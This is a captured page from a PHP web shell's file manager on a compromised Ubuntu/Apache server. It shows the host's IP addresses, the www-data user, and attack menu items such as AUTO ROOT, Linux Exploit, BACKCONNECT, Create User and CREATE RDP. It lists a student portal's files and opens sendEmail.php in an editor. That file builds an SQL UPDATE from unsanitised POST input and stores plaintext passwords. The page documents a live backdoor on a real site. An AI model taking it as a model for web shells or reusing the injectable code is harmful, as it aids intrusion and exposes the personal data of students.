Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.143.239.63
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
misc /
public_html /
studentportal_old /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
html_modules
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
phpmailer
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
sendgrid-php
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
testp
[ DIR ]
drwxr-xr-x
MainPage.html
23.32
KB
-rwxr-xr-x
MainPage2.html
15.28
KB
-rwxr-xr-x
MainPage_20022018.html
23
KB
-rwxr-xr-x
background.jpg
42.45
KB
-rwxr-xr-x
cManualMailer.php
3.69
KB
-rwxr-xr-x
candidate_list.js
38.68
KB
-rwxr-xr-x
database.php
378
B
-rwxr-xr-x
forgot-password.html
5.51
KB
-rwxr-xr-x
forgot-password.php
2.19
KB
-rwxr-xr-x
forgot-password_01032018.php
2.06
KB
-rwxr-xr-x
getstatesanduniv.php
419
B
-rwxr-xr-x
header.php
1.03
KB
-rwxr-xr-x
helpdesk.html
2.71
KB
-rwxr-xr-x
index.html
4.45
KB
-rwxr-xr-x
lastdate.html
3.25
KB
-rwxr-xr-x
loding.gif
83.38
KB
-rwxr-xr-x
registration.html
7.25
KB
-rwxr-xr-x
registration.php
605
B
-rwxr-xr-x
resetpassword.php
696
B
-rwxr-xr-x
sendEmail.php
1.87
KB
-rwxr-xr-x
sendGridMail.php
1.2
KB
-rwxr-xr-x
sendMailTest.php
1.5
KB
-rwxr-xr-x
sendMobEmailOTP.php
3.31
KB
-rwxr-xr-x
sendMobEmailOTP_19022018.php
2.99
KB
-rwxr-xr-x
sendotp.php
1.28
KB
-rwxr-xr-x
sendsmsapi.php
831
B
-rwxr-xr-x
sendsmsapi_28032018.php
468
B
-rwxr-xr-x
sign-in.html
3.99
KB
-rwxr-xr-x
sign-up.html
7.49
KB
-rwxr-xr-x
signin.php
830
B
-rwxr-xr-x
signup.php
830
B
-rwxr-xr-x
validateEmail.php
1
KB
-rwxr-xr-x
validateInfo.php
1.69
KB
-rwxr-xr-x
validateRegno.php
693
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sendEmail.php
<?php require_once("cManualMailer.php"); include("database.php"); $regno = $_POST['regno']; $emailid = $_POST['email']; //var_dump($emailid); $passwd = strtoupper(substr(sha1(rand()), 0, 8)); $hash = md5( rand(0,1000) ); $message="<html>"; $message.="<body>"; $message.="<style>"; $message.=".mail_tbl td{text-align:left; padding:2px; font-size:12px; font-family: Verdana, Arial, Helvetica, sans-serif;}"; $message.="</style>"; $message.="<p style='font-size:12px; font-family: Verdana, Arial, Helvetica, sans-serif'>Dear Student,</p></br>"; $message.="<p style='font-size:12px; font-family: Verdana, Arial, Helvetica, sans-serif'>Greetings from Logisys,<br/> You have registered to Student Portal Successfully<br/></p></br>"; $message.="<p style='font-size:12px; font-family: Verdana, Arial, Helvetica, sans-serif'>---------------------------------<br/>Register number : $regno <br/> Password : $passwd<br/>----------------------------------</p></br>"; $message.="<p style='font-size:12px; font-family: Verdana, Arial, Helvetica, sans-serif'>Click on the below link to login</p><br/><br/>"; $message.="<p style='font-size:12px; font-family: Verdana, Arial, Helvetica, sans-serif'><a href='http://server/PHPSource/student/common/student.php?r=$regno&email=$emailid&hash=$hash&c=CATI&li=Normal%20Fee'>http://server/PHPSource/studentlogin/sign-in.html?regno=$regno&email=$emailid&hash=$hash</a></p>"; $message.="</br>"; $message.="</body>"; $message.="</html>"; $subject="Student Portal Authentication"; $data = send_manual_mail($emailid,$subject,$message,$replay_to=null,$cc=null,'techsupport@logisys.net.in'); if($data == 'true') { $query = "update masuser set femailid = '{$emailid}', fpasswd = '{$passwd}', factive = '0', femailhash = '{$hash}' where fusername = '{$regno}'"; $result = $conn->query($query); if($result == 1) { echo 'inserted'; } else { echo 'Something went wrong'; } } ?>
Close